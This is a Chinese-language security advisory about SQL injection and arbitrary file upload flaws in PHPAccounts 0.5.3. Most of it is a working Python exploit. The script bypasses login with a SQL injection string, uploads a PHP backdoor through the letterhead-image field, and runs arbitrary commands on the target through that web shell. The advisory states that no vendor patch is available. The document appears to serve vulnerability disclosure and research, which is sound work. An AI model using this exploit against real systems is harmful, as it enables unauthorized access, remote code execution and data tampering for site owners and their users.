PHPAccounts SQL注入和任意文件上传漏洞
发布日期:2012-06-11
更新日期:2012-06-21
受影响系统:
phpaccounts phpaccounts
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53920
PHPAccounts是针对小型企业、自由职业者、咨询公司的简单的基于Web的账号应用。
PHPAccounts中存在SQL注入漏洞和任意文件上传漏洞,这些漏洞源于未验证用户提供的数据。攻击者可利用该漏洞操控应用程序,执行任意代码,访问或修改数据,或在底层数据库中利用这些漏洞。
<*来源:loneferret
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
import re, mechanize
import urllib, sys
print "\n[*] phpAcounts v.0.5.3 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 3):
print "[*] Usage: poc.py <RHOST> <RCMD>"
exit(0)
rhost = sys.argv[1]
rcmd = sys.argv[2]
print "[*] Bypassing Login ."
try:
br = mechanize.Browser()
br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)
assert br.viewing_html()
br.select_form(name="loginForm")
br.select_form(nr=0)
br.form['Login_Username'] = "x' or '1'#"
br.form['Login_Password'] = "pwnd"
print "[*] Triggering SQLi .."
br.submit()
except:
print "[*] Oups..Something happened"
exit(0)
print "[*] Uploading Shell ..."
try:
br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)
assert br.viewing_html()
br.select_form(nr=0)
br.form["Preferences[LETTER_HEADER]"] = 'test'
br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")
br.submit(nr=2)
except:
print "[*] Upload didn't work"
exit(0)
print "[*] Command Executed\n"
try:
shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd))
print shell.read()
except:
print "[*] Oups."
exit(0)
建议:
--------------------------------------------------------------------------------
厂商补丁:
phpaccounts
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: